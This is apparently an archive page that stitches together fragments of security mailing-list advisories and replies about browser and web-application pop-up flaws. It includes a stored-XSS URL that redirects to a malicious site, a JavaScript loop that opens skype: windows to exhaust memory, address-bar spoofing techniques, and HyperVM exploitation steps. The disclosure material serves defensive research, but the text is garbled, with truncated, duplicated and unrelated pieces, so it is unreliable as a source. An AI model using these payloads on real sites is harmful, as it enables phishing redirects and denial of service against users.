Next Page >>
pop/up
This is a Cross Site Scripting (XSS) vulnerability within vBulletin
community forum solution. In order to exploit this flaw the following
option needs to be activated:
'http://victim/vBulletin/profile.php?do=editoptions' (Show New Private
Message Notification Pop-Up enabled). There are many forums with this
option enabled by default for all new users.
The title is not being encoded in the following rendered HTML code:
/-----------
Ok, I'm missing it, what exactly is the spoof here? When the popup comes up
for me, the address of the page is
http://www.google.com.ar/#www.microsoft.com and I see in the address bar
#www.microsoft.com.
If I'm understanding the wording below correctly, it's because the # keeps
the browser from interpreting Microsoft.com and thus giving a bad URL, and
presumably, the browser cannot or does not have the ability to show the full
address (and perhaps in other browsers or scenarios people don't see the #
like I did - and also don't realize that the browser always prefixes it's
===============================ADVISORY===============================
Description:
------------
A malicious web page can extract out all the data stored within the autocomplete history of a user's Firefox browser. The web page must convince a user to hold down the left or right-arrow keys then the contents of the autocomplete popup can be read. This may includes the search history box within the browser, or other personal details.
Analysis
--------
A malicious web page can be created that includes a text field with the same 'name' attribute as data entered on other sites (e.g 'q' for Google). The form autocompletion popup in Firefox can then be triggered and manipulated by a variety of key presses. For example, by pressing the 'a' key, autocomplete entries starting with that letter will be shown. Entries in the poupup can be selected by using the up/ down arrow keys. When the left or right arrow key is pressed, the currently selected entry from the popup is entered into the text field and can be read through JavaScript.
Hello, as they are? This time I communicate with you to let you know of a vulnerability such as "spoofing" in the Internet Explorer 7.0 (tested at 8.0 and does not work).
Creating a pop-up malformated can put any address in the address bar in the body any page or content.
This flaw is possible because if in the address bar we eg
Address # direction
The numeral makes the first address is run and what comes after the numeral does not interfere with the original page. This is why creating popup with the special measures and to try to pass such an easterly direction popup displayed the end of the address and did not show the direction it runs. (Special measures are important because if it does not work largest).
Just a single click in the body popup to this reveals the true direction, which can be equal to dodge an event like javascript onblur or onfocus .. Anyway that's more serious an attack that a proof of concept.
> redirected:
>
> https://webmail.domain.tld/owa/redir.aspx?
> C=efb6ad0a2be24a368596c275b5e4ae8d&URL=http%3a%2f%2fwww.csnc.ch%2f
>
> Still, if we leave it away, it's only a pop-up which is clicked
> away and the redirection is still done.
>
> If the user is not logged on when he clicks on the specially crafted
> URL, he is also redirected to the logon screen and redirected after
> successful login (including the warning pop-up):
redirected:
https://webmail.domain.tld/owa/redir.aspx?
C=efb6ad0a2be24a368596c275b5e4ae8d&URL=http%3a%2f%2fwww.csnc.ch%2f
Still, if we leave it away, it's only a pop-up which is clicked
away and the redirection is still done.
If the user is not logged on when he clicks on the specially crafted
URL, he is also redirected to the logon screen and redirected after
successful login (including the warning pop-up):
Dear w0lfd33m:
Not fail in firefox, these poorly understood failure.
The fault is not that they are both directions numeral (#) if it is that when you create a popup with this small sample size the end of the address complete numeral only makes what is behind it is irrelevant to the The first address, then create the popup which is only the end of the address is the address false and there is failure. This only works in Internet Explorer.
Greetings.
https://<servername>.webex.com/.
2. Select Assistant on the left side of the page.
3. Select the Support link.
4. Select the Version link, which is displayed on the right side of
the top of the page.
5. The Client Build version is displayed in a pop-up window.
There is currently no fixed version for the WBS 25-based WebEx
meeting service. This section of the Security Advisory will be
updated when fixed version information is available.
Hi
This article deals with the latest third party popup attacks that are
performed by an attacker from the rogue
and vulnerable links of the web sites to circumvent the normal
functioning on the web. The target website
always seems to be the liable web provider from where the popup attacks
are possible. It also discusses
other problems related with Pop Ups.
> tested your claim, on a fully patched/updated Win XP SP2 system with
an
> admin account logged in, and was warned sufficiently(asked whether I
> wanted to play asx files, then asked if I was sure by Media Player,
then
> pop-up was blocked by IE), while the page you tried to produce was
> blocked via IE's pop-up blocker.
>
> You can see/confirm this by viewing these screenshots:
>
> http://preview.tinyurl.com/34xpcz
>
> Great admirer of your work :) I just wanted to inform you that I have
> tested your claim, on a fully patched/updated Win XP SP2 system with an
> admin account logged in, and was warned sufficiently(asked whether I
> wanted to play asx files, then asked if I was sure by Media Player, then
> pop-up was blocked by IE), while the page you tried to produce was
> blocked via IE's pop-up blocker.
>
> You can see/confirm this by viewing these screenshots:
>
> http://preview.tinyurl.com/34xpcz
Great admirer of your work :) I just wanted to inform you that I have
tested your claim, on a fully patched/updated Win XP SP2 system with an
admin account logged in, and was warned sufficiently(asked whether I
wanted to play asx files, then asked if I was sure by Media Player, then
pop-up was blocked by IE), while the page you tried to produce was
blocked via IE's pop-up blocker.
You can see/confirm this by viewing these screenshots:
http://preview.tinyurl.com/34xpcz
> [mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of Aditya K
> Sood
> Sent: 17 August 2007 09:07
> To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com;
> websecurity@webappsec.org; Steven M. Christey
> Subject: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up
> Blocker Bypassing and Dos Vulnerability
>
> Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos
> Vulnerability
>
======================================================================
Secunia Research 26/01/2010
- Google Chrome Pop-Up Block Menu Handling Vulnerability -
======================================================================
Table of Contents
Affected Software....................................................1
Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos
Vulnerability
Dated : 15 August 2007
Severity : Critical
Explanation :
The vulnerability persists in the popup blocker functioning to allow
10. In the Distribution medium enter the full path to the
‘ingres.tar' file (including the file) (See step 4).
11. Choose PackageInstall from the list of installation options
and then choose ‘Stand alone DBMS Server' from the list of
packages. Then choose ExpressInstall.
12. Choose Yes in the pop-up screen and press Enter key.
The install utility verifies that each component was
transferred properly from the distribution medium. When this
is finished (without errors), another pop-up screen for
setting up the components comes up.
13. Select Yes and press Enter key to go to the Setup program.
[mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of Aditya K
Sood
Sent: 17 August 2007 09:07
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com;
websecurity@webappsec.org; Steven M. Christey
Subject: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up
Blocker Bypassing and Dos Vulnerability
Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos
Vulnerability
Customer%20Analysis&action=CustomerLifeTimeOrders.xaction
Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1
Cookie2: $Version=1
Proxy-Connection: Keep-Alive
When the request will be executed, a popup showing the string Pwnd can be seen.
Here the response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA
sable_reason";s:0:"";s:11:"createstage";s:0:"";s:13:"createmessage";s:0:"";s:12:"rootpassword";s:21:"xxxxxxxxxxxxxxxxxxxx";s:20:"rootpassword_changed";s
So in summary, here are the exploitation steps:
1. Log into HyperVM/Kloxo
2. Click "Backup Home"
3. In the field labeled "Restore from file", browse for any restore file from the popup box.
4. Wait till the VM has finished restoring from backup.
5. Login. If the root user hasn't deleted these files from /tmp/backupXXXXX before bringing up the network interface, you win.
Mitigation:
After the VM is restarted, manually delete these files as the root user before anyone else reads them.
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>window.location="http://malicious-site.com";</script></html>
Then when the user visits "My Saved Carts" at
http://victim.com/user_carts.php the code is executed:
Example 1 would give a link to the Google search engine.
Example 2 would give a javascript alert popup displaying "VULN".
Example 3 would send the user to a malicious site.
Note: manuals_search.php is also vulnerable to the same
HTML/Javascript vulnerability that allows for arbitrary code to
be executed:
The value of the "src" attribute will not be recognized by the filtering
attempts following the decoding in the cleanHTML() function.
A message with such an image tag in the body will trigger the JavaScript
and open a popup box if the browser supports "javascript:" attribute
values in image elements' "src" attributes. This particular proof of
concept works with Internet Explorer 6, the newest Firefox will not
execute the JavaScript.
>> launching other applications such as: Maps, YouTube, and iTunes.
>> Launching these applications can be achieved through loading special
>> URLs using the meta refresh tag. This is shown in the second
>> proof-of-concept exploit below.
>>
>> We also discovered that the bug can also be triggered through popup
>> windows (e.g. javascript alert). In this situation the initiating app
>> does not need to be termianted in order to active the call.
>>
>> Finally, we discovered a second bug that can be used to perform
>> malicious phone calls that cannot be prevented or canceled by the
decrease or eliminate the risks of reading your email (viruses,
javascript, webbugs, etc). POP Peeper can be run from a
portable device and can be password protected. Many notification options
are availble to indicate when new mail has
arrived, such as sound alerts (configurable for each account), flashing
scroll lock, skinnable popup notifier, customized
screensaver and more."
Source: http://www.poppeeper.org
-------------------------------------------------------------------------------------------------------------------------
> setting focus on each other, you can force the user to quit the
> browser and eventually crash it if the user holds the enter key when a
> javascript alert window appears.
>
> This bug seems to be fixed in Internet Explorer 7, Microsoft seems to
> have added a counter that limits the number of consecutive pop-up
> alerts.
> A variation of that bug has been reported to firefox a few years ago
> (see related file), but seems to never have been posted on official
> security channels.
>
Mozilla developer Justin Dolske reported that the new asynchronous
Authorization Prompt (HTTP username and password) was not always
attached to the correct window. Although we have not demonstrated
this, it may be possible for a malicious page to convince a user
to open a new tab or popup to a trusted service and then have the
HTTP authorization prompt from the malicious page appear to be the
login prompt for the trusted page. This potential attack is greatly
mitigated by the fact that very few web sites use HTTP authorization,
preferring instead to use web forms and cookies (CVE-2010-0172).
Security issues were identified and fixed in firefox:
An unspecified function in the JavaScript implementation in Mozilla
Firefox creates and exposes a temporary footprint when there is
a current login to a web site, which makes it easier for remote
attackers to trick a user into acting upon a spoofed pop-up message,
aka an in-session phishing attack. (CVE-2008-5913).
The JavaScript implementation in Mozilla Firefox 3.x allows remote
attackers to send selected keystrokes to a form field in a hidden
frame, instead of the intended form field in a visible frame, via
>
> > it turns out, Outlook is doing nothing close to what I feared.
> > Basically, the second instance sees that another Outlook window is
> > running in the same interactive logon space, and when it starts, it
just
> > calls another popup in the previous Outlook space and then terminates
> > itself (that's close enough, anyway). The good news is that there is
no
> > "user hopping" or "boundary crossing" here.
>
> Sounds comparable to what the Windows Explorer does when
--On November 1, 2007 3:36:00 PM -1000 Peter Besenbruch <prb@lava.net>
wrote:
>
> Firefox throws up a download dialog, asking what I should do
> with "prettyyoungthing.rpm," while a Javascript pop-up explains that to
> see these great images, I need to save the file, and type "rpm -i
> prettyyoungthing.rpm," and that I need to do it as root.
There is no need to do that. In both Macs and Gnome or KDE on Unix, if
you try to run rpm -i (of whatever the install paradigm is on your flavor
1. Skype and Internet Explorer uri handler mechanism memory resources consumption bug:
<script>
for (var x = 1; x <= 666; x++)
{
popup_window = window.open('skype:happy_negro?call');
popup_window.close ();
}
</script>
This will invoke many skype.exe processes and as they are not closed - much memory will be consumed. Such script will be blocked by popup blocker, so it is possible to do it other way:
> launching other applications such as: Maps, YouTube, and iTunes.
> Launching these applications can be achieved through loading special
> URLs using the meta refresh tag. This is shown in the second
> proof-of-concept exploit below.
>
> We also discovered that the bug can also be triggered through popup
> windows (e.g. javascript alert). In this situation the initiating app
> does not need to be termianted in order to active the call.
>
> Finally, we discovered a second bug that can be used to perform
> malicious phone calls that cannot be prevented or canceled by the
Next Page>>
|
